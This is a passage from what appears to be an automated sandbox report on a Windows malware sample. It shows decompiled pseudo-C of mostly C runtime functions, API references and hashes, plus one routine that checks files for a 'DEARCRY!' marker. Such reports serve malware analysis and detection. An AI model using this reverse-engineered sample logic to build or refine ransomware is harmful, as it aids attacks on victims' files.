                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __fread_nolock
                                                              • String ID:
                                                              • API String ID: 2638373210-0
                                                              • Opcode ID: d8063289e846f9151b46690068a3784d31b8fbefa203fd175fd5b29ea05b42d3
                                                              • Instruction ID: 5bbaf44d8135ecb583567a6e0ad93413b50458ff2d3b2b5e993b5da9f184b4cb
                                                              • Opcode Fuzzy Hash: d8063289e846f9151b46690068a3784d31b8fbefa203fd175fd5b29ea05b42d3
                                                              • Instruction Fuzzy Hash: FD21B07160420137FE30EA289CC6FBF3695EB91710F400C79F319E6181D675E58596A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C69CB2, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 32%
                                                              			E00C69CB2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0xcbf980);
				_t8 = E00C70838(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00C7087D(_t8);
				}
				if( *0xecc8dc != 3) {
					_push(_t24);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0xcc9860); // executed
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E00C6D8C9(_t32);
						 *_t10 = E00C6D887(GetLastError());
					}
					goto L9;
				}
				E00C6FD40(__ebx, __edi, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00C6FD73(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00C6FDA3();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E00C69D08();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}







                                                              0x00c69cb2
                                                              0x00c69cb4
                                                              0x00c69cb9
                                                              0x00c69cbe
                                                              0x00c69cc3
                                                              0x00c69d3a
                                                              0x00c69d3f
                                                              0x00c69d3f
                                                              0x00c69ccc
                                                              0x00c69d11
                                                              0x00c69d12
                                                              0x00c69d12
                                                              0x00c69d1a
                                                              0x00c69d20
                                                              0x00c69d22
                                                              0x00c69d24
                                                              0x00c69d37
                                                              0x00c69d39
                                                              0x00000000
                                                              0x00c69d22
                                                              0x00c69cd0
                                                              0x00c69cd6
                                                              0x00c69cdb
                                                              0x00c69ce1
                                                              0x00c69ce6
                                                              0x00c69ce8
                                                              0x00c69ce9
                                                              0x00c69cea
                                                              0x00c69cf0
                                                              0x00c69cf1
                                                              0x00c69cf8
                                                              0x00c69d01
                                                              0x00000000
                                                              0x00c69d03
                                                              0x00c69d03
                                                              0x00000000
                                                              0x00c69d03

                                                              APIs
                                                              • __lock.LIBCMT ref: 00C69CD0
                                                                • Part of subcall function 00C6FD40: __mtinitlocknum.LIBCMT ref: 00C6FD56
                                                                • Part of subcall function 00C6FD40: __amsg_exit.LIBCMT ref: 00C6FD62
                                                                • Part of subcall function 00C6FD40: EnterCriticalSection.KERNEL32(?,?,?,00C70AAD,00000004,00CBFCC8,0000000C,00C69D5A,?,?,00000000,?,?,?,00B91010,00000021), ref: 00C6FD6A
                                                              • ___sbh_find_block.LIBCMT ref: 00C69CDB
                                                              • ___sbh_free_block.LIBCMT ref: 00C69CEA
                                                              • RtlFreeHeap.NTDLL(00000000,?,00CBF980,0000000C,00C740F9,00000000,?,00C716F3,?,00000001,?,?,00C6FCCA,00000018,00CBFCA8,0000000C), ref: 00C69D1A
                                                              • GetLastError.KERNEL32(?,00C716F3,?,00000001,?,?,00C6FCCA,00000018,00CBFCA8,0000000C,00C6FD5B,?,?,?,00C70AAD,00000004), ref: 00C69D2B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 2714421763-0
                                                              • Opcode ID: 57613ffd878d4d37270d1685fbb02062414c18da91a36dfa804fdef85b2f67f5
                                                              • Instruction ID: a0eb959c140ed64cf6b08b8413b70d6c5eed71943d64b889e2036f6978d288f3
                                                              • Opcode Fuzzy Hash: 57613ffd878d4d37270d1685fbb02062414c18da91a36dfa804fdef85b2f67f5
                                                              • Instruction Fuzzy Hash: 0201D671E00306EADF347FB1AC8AB8D37B8EF12365F204028F5546A0D1CA349A41EB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C6AC41, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 91%
                                                              			E00C6AC41(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E00C6EC95(_t90, _t97,  *_v8, _t100); // executed
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E00C6D3F3(_t100)); // executed
										_t74 = E00C7335D(_t81, _t90, _t98, _t100, __eflags); // executed
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E00C6D021(_t90, _t100); // executed
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E00C6B7A0(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E00C6D8C9(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E00C6FB6E(_t90, 0, _t100);
					goto L4;
				}
			}





























                                                              0x00c6ac41
                                                              0x00c6ac51
                                                              0x00c6ac77
                                                              0x00000000
                                                              0x00c6ac58
                                                              0x00c6ac58
                                                              0x00c6ac5b
                                                              0x00c6ac5d
                                                              0x00c6ac7e
                                                              0x00c6ac81
                                                              0x00c6ac83
                                                              0x00000000
                                                              0x00000000
                                                              0x00c6ac85
                                                              0x00c6ac8a
                                                              0x00c6ac8d
                                                              0x00c6ac90
                                                              0x00000000
                                                              0x00000000
                                                              0x00c6ac95
                                                              0x00c6ac99
                                                              0x00c6aca0
                                                              0x00c6aca3
                                                              0x00c6aca6
                                                              0x00c6aca8
                                                              0x00c6acb2
                                                              0x00c6acaa
                                                              0x00c6acad
                                                              0x00c6acad
                                                              0x00c6acb9
                                                              0x00c6acbb
                                                              0x00c6ad80
                                                              0x00000000
                                                              0x00c6acc1
                                                              0x00c6acc1
                                                              0x00c6acc4
                                                              0x00c6acc4
                                                              0x00c6acca
                                                              0x00c6acfb
                                                              0x00c6acfb
                                                              0x00c6acfe
                                                              0x00c6ad57
                                                              0x00c6ad5e
                                                              0x00c6ad61
                                                              0x00c6ad8c
                                                              0x00c6ad8c
                                                              0x00c6ad8e
                                                              0x00000000
                                                              0x00c6ad92
                                                              0x00c6ad63
                                                              0x00c6ad66
                                                              0x00c6ad69
                                                              0x00c6ad6a
                                                              0x00c6ad6d
                                                              0x00c6ad6f
                                                              0x00c6ad71
                                                              0x00c6ad71
                                                              0x00000000
                                                              0x00c6ad6f
                                                              0x00c6ad00
                                                              0x00c6ad02
                                                              0x00c6ad0f
                                                              0x00c6ad0f
                                                              0x00c6ad13
                                                              0x00c6ad15
                                                              0x00c6ad19
                                                              0x00c6ad1b
                                                              0x00c6ad1e
                                                              0x00c6ad1e
                                                              0x00c6ad1e
                                                              0x00c6ad20
                                                              0x00c6ad21
                                                              0x00c6ad2b
                                                              0x00c6ad2c
                                                              0x00c6ad31
                                                              0x00c6ad34
                                                              0x00c6ad37
                                                              0x00c6ad9a
                                                              0x00c6ad9a
                                                              0x00c6ad9e
                                                              0x00000000
                                                              0x00c6ad39
                                                              0x00c6ad39
                                                              0x00c6ad3b
                                                              0x00c6ad3d
                                                              0x00c6ad3f
                                                              0x00c6ad3f
                                                              0x00c6ad41
                                                              0x00c6ad44
                                                              0x00c6ad46
                                                              0x00c6ad48
                                                              0x00000000
                                                              0x00c6ad4a
                                                              0x00c6ad4a
                                                              0x00c6ad4a
                                                              0x00000000
                                                              0x00c6ad4a
                                                              0x00c6ad48
                                                              0x00c6ad37
                                                              0x00c6ad05
                                                              0x00c6ad0b
                                                              0x00c6ad0d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00c6ad0d
                                                              0x00c6accc
                                                              0x00c6accf
                                                              0x00c6acd1
                                                              0x00000000
                                                              0x00000000
                                                              0x00c6acd3
                                                              0x00c6ad88
                                                              0x00c6ad88
                                                              0x00c6ad88
                                                              0x00000000
                                                              0x00c6ad88
                                                              0x00c6acd9
                                                              0x00c6acdb
                                                              0x00c6acdd
                                                              0x00c6acdf
                                                              0x00c6acdf
                                                              0x00c6ace7
                                                              0x00c6acec
                                                              0x00c6acef
                                                              0x00c6acf1
                                                              0x00c6acf4
                                                              0x00c6acf6
                                                              0x00000000
                                                              0x00c6ad78
                                                              0x00c6ad78
                                                              0x00c6ad78
                                                              0x00000000
                                                              0x00c6acc1
                                                              0x00c6acbb
                                                              0x00c6ac5f
                                                              0x00c6ac5f
                                                              0x00c6ac64
                                                              0x00c6ac65
                                                              0x00c6ac66
                                                              0x00c6ac67
                                                              0x00c6ac68
                                                              0x00c6ac69
                                                              0x00c6ac6f
                                                              0x00000000
                                                              0x00c6ac74

                                                              APIs
                                                              • __flush.LIBCMT ref: 00C6AD05
                                                              • __fileno.LIBCMT ref: 00C6AD25
                                                              • __locking.LIBCMT ref: 00C6AD2C
                                                              • __flsbuf.LIBCMT ref: 00C6AD57
                                                                • Part of subcall function 00C6D8C9: __getptd_noexit.LIBCMT ref: 00C6D8C9
                                                                • Part of subcall function 00C6FB6E: __decode_pointer.LIBCMT ref: 00C6FB79
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                              • String ID:
                                                              • API String ID: 3240763771-0
                                                              • Opcode ID: af10f783225c8cfc59b5e0970ee8d4778b09fd3305b4cbaa056fec7ae8dbeaa3
                                                              • Instruction ID: 13432e7231fa3c019a7fdfa98b6bafa8d8dc4d987af1c7d3a1e04f80b44a0671
                                                              • Opcode Fuzzy Hash: af10f783225c8cfc59b5e0970ee8d4778b09fd3305b4cbaa056fec7ae8dbeaa3
                                                              • Instruction Fuzzy Hash: AA41E631A00604EFDB389F69C8C05AEBBB6EF80361F248529E466A7550E771DF41DF52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B910F6, Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 95%
                                                              			E00B910F6(void* __eax, intOrPtr __ebx, void* __ecx, intOrPtr __esi, void* __ebp, char _a4, char _a8, char _a12, char _a276, signed int _a532) {
				void* _t14;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				intOrPtr _t25;
				void* _t26;
				signed int _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t37;
				signed int _t49;

				_t35 = __esi;
				_t26 = __ecx;
				_t25 = __ebx;
				_t14 = __eax;
				while(1) {
					_t32 =  *((intOrPtr*)(_t37 + _t26 + 0x14));
					_t3 = _t26 + "DEARCRY!"; // 0x52414544
					if( *((intOrPtr*)(_t37 + _t26 + 0x14)) !=  *_t3) {
						break;
					}
					_t14 = _t14 - 4;
					_t26 = _t26 + 4;
					if(_t14 >= 4) {
						continue;
					} else {
						_t19 = E00C6AC24( &_a4, 1, 4, _t35);
						_t37 = _t37 + 0x10;
						if(_t19 == 4 && _a4 == 0x100) {
							_t20 = E00C6AC24( &_a276, 1, 0x100, _t35);
							_t37 = _t37 + 0x10;
							if(_t20 == _a4) {
								_t32 =  &_a8;
								_t21 = E00C6AC24( &_a8, 1, 4, _t35);
								_t37 = _t37 + 0x10;
								if(_t21 == 4) {
									_t22 = _a8;
									if(_t22 == 3 || _t22 == 4) {
										_t24 = E00C6AC24( &_a12, 1, 8, _t35);
										_t37 = _t37 + 0x10;
										_t12 = _t24 == 8;
										_t49 = _t12;
										_t33 = 0 | _t12;
									}
								}
							}
						}
						break;
					}
				}
				E00C6B1A7(_t25, _t32, _t33, _t35, _t49); // executed
				_t34 = _t35;
				return E00C69C26(_t33, _t25, _a532 ^ _t37 + 0x00000004, _t32, _t34, _t35);
			}
















                                                              0x00b910f6
                                                              0x00b910f6
                                                              0x00b910f6
                                                              0x00b910f6
                                                              0x00b91100
                                                              0x00b91100
                                                              0x00b91104
                                                              0x00b9110a
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91110
                                                              0x00b91113
                                                              0x00b91119
                                                              0x00000000
                                                              0x00b9111b
                                                              0x00b91125
                                                              0x00b9112a
                                                              0x00b91130
                                                              0x00b9114c
                                                              0x00b91151
                                                              0x00b91158
                                                              0x00b9115d
                                                              0x00b91164
                                                              0x00b91169
                                                              0x00b9116f
                                                              0x00b91171
                                                              0x00b91178
                                                              0x00b91189
                                                              0x00b91190
                                                              0x00b91196
                                                              0x00b91196
                                                              0x00b91199
                                                              0x00b91199
                                                              0x00b91178
                                                              0x00b9116f
                                                              0x00b91158
                                                              0x00000000
                                                              0x00b91130
                                                              0x00b91119
                                                              0x00b9119c
                                                              0x00b911ad
                                                              0x00b911bb

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __fread_nolock
                                                              • String ID:
                                                              • API String ID: 2638373210-0
                                                              • Opcode ID: 9b11bf86685b95dbec446e58e2f3c31ccfabd4ffce7e0c0baec411e74dd20759
                                                              • Instruction ID: cc68dfa22c86952bbc5a4adc8053b3d4e92ef031278dfacec306ae6b418ab6c7
                                                              • Opcode Fuzzy Hash: 9b11bf86685b95dbec446e58e2f3c31ccfabd4ffce7e0c0baec411e74dd20759
                                                              • Instruction Fuzzy Hash: F811017160430137FE34EA248CC6FBE32A5EB90714F140C79F319E6182D676E981D6A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C6A686, Relevance: 4.5, APIs: 3, Instructions: 21fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00C6A686(CHAR* _a4) {
				int _t2;
				long _t3;

				_t2 = DeleteFileA(_a4); // executed
				if(_t2 != 0) {
					_t3 = 0;
				} else {
					_t3 = GetLastError();
				}
				if(_t3 == 0) {
					return 0;
				} else {
					return E00C6D8EF(_t3) | 0xffffffff;
				}
			}





                                                              0x00c6a68e
                                                              0x00c6a696
                                                              0x00c6a6a0
                                                              0x00c6a698
                                                              0x00c6a698
                                                              0x00c6a698
                                                              0x00c6a6a4
                                                              0x00c6a6b5
                                                              0x00c6a6a6
                                                              0x00c6a6b1
                                                              0x00c6a6b1

                                                              APIs
                                                              • DeleteFileA.KERNELBASE(?,?,00B91587,?,?), ref: 00C6A68E
                                                              • GetLastError.KERNEL32 ref: 00C6A698
                                                              • __dosmaperr.LIBCMT ref: 00C6A6A7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast__dosmaperr
                                                              • String ID:
                                                              • API String ID: 1545401867-0
                                                              • Opcode ID: 12814c5c03df854fa9355598df97868b5493a35c863af50142ce98b608562ccc
                                                              • Instruction ID: bb52054d798580b3a689980490b9bdd4c05f1562092ac29f0e4ff7af605391b6
                                                              • Opcode Fuzzy Hash: 12814c5c03df854fa9355598df97868b5493a35c863af50142ce98b608562ccc
                                                              • Instruction Fuzzy Hash: B7D05E31244109678B641AB7EC4D71F3A9C9B803707285560F42DD50A1EE21CC519A55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C6AB8E, Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 70%
                                                              			E00C6AB8E(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t33;
				void* _t34;

				_t30 = __edi;
				_t29 = __edx;
				_push(0xc);
				_push(0xcbfa20);
				E00C70838(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
						E00C6A4BD( *((intOrPtr*)(_t33 + 0x18)));
						 *((intOrPtr*)(_t33 - 4)) = 0;
						_t22 = E00C6A984(__edx,  *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
						E00C6AC1A();
						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
					} else {
						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
							E00C6BB40(__edi,  *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
							_t34 = _t34 + 0xc;
						}
						 *((intOrPtr*)(E00C6D8C9(_t41))) = 0x16;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00C6FB6E(_t29, _t30, 0);
						goto L6;
					}
				}
				return E00C7087D(_t19);
			}







                                                              0x00c6ab8e
                                                              0x00c6ab8e
                                                              0x00c6ab8e
                                                              0x00c6ab90
                                                              0x00c6ab95
                                                              0x00c6ab9c
                                                              0x00c6aba2
                                                              0x00c6abdb
                                                              0x00c6abdb
                                                              0x00c6aba9
                                                              0x00c6abac
                                                              0x00c6abe6
                                                              0x00c6abec
                                                              0x00c6abfe
                                                              0x00c6ac06
                                                              0x00c6ac09
                                                              0x00c6ac10
                                                              0x00c6ac15
                                                              0x00c6abae
                                                              0x00c6abae
                                                              0x00c6abb2
                                                              0x00c6abbb
                                                              0x00c6abc0
                                                              0x00c6abc0
                                                              0x00c6abc8
                                                              0x00c6abce
                                                              0x00c6abcf
                                                              0x00c6abd0
                                                              0x00c6abd1
                                                              0x00c6abd2
                                                              0x00c6abd3
                                                              0x00000000
                                                              0x00c6abd8
                                                              0x00c6abac
                                                              0x00c6abe2

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __lock_file_memset
                                                              • String ID:
                                                              • API String ID: 26237723-0
                                                              • Opcode ID: 2303dc44c5ffb67f7c0826a06f6f34f8165792c633cec79257e5db0c6f386449
                                                              • Instruction ID: f257968001c470bf0457bf03cf99589b74162e0785a61c7c521db00dff283572
                                                              • Opcode Fuzzy Hash: 2303dc44c5ffb67f7c0826a06f6f34f8165792c633cec79257e5db0c6f386449
                                                              • Instruction Fuzzy Hash: AD015E71C01219EBCF31BFA4DC4289EBB71AF44750F108165F829261A2D7358A62FFD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C6B1A7, Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 66%
                                                              			E00C6B1A7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t18;
				signed int _t20;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t36;

				_push(0xc);
				_push(0xcbfa80);
				E00C70838(__ebx, __edi, __esi);
				 *(_t32 - 0x1c) =  *(_t32 - 0x1c) | 0xffffffff;
				_t31 =  *((intOrPtr*)(_t32 + 8));
				_t36 = _t31;
				_t37 = _t36 != 0;
				if(_t36 != 0) {
					__eflags =  *(_t31 + 0xc) & 0x00000040;
					if(( *(_t31 + 0xc) & 0x00000040) == 0) {
						E00C6A4BD(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t18 = E00C6B130(__edx, _t31); // executed
						 *(_t32 - 0x1c) = _t18;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E00C6B21B(_t31);
					} else {
						 *(_t31 + 0xc) = 0;
					}
					_t20 =  *(_t32 - 0x1c);
				} else {
					 *((intOrPtr*)(E00C6D8C9(_t37))) = 0x16;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t20 = E00C6FB6E(__edx, 0, _t31) | 0xffffffff;
				}
				return E00C7087D(_t20);
			}








                                                              0x00c6b1a7
                                                              0x00c6b1a9
                                                              0x00c6b1ae
                                                              0x00c6b1b3
                                                              0x00c6b1b9
                                                              0x00c6b1be
                                                              0x00c6b1c3
                                                              0x00c6b1c5
                                                              0x00c6b1e4
                                                              0x00c6b1e8
                                                              0x00c6b1f7
                                                              0x00c6b1fd
                                                              0x00c6b201
                                                              0x00c6b207
                                                              0x00c6b20a
                                                              0x00c6b211
                                                              0x00c6b1ea
                                                              0x00c6b1ea
                                                              0x00c6b1ea
                                                              0x00c6b1ed
                                                              0x00c6b1c7
                                                              0x00c6b1cc
                                                              0x00c6b1d2
                                                              0x00c6b1d3
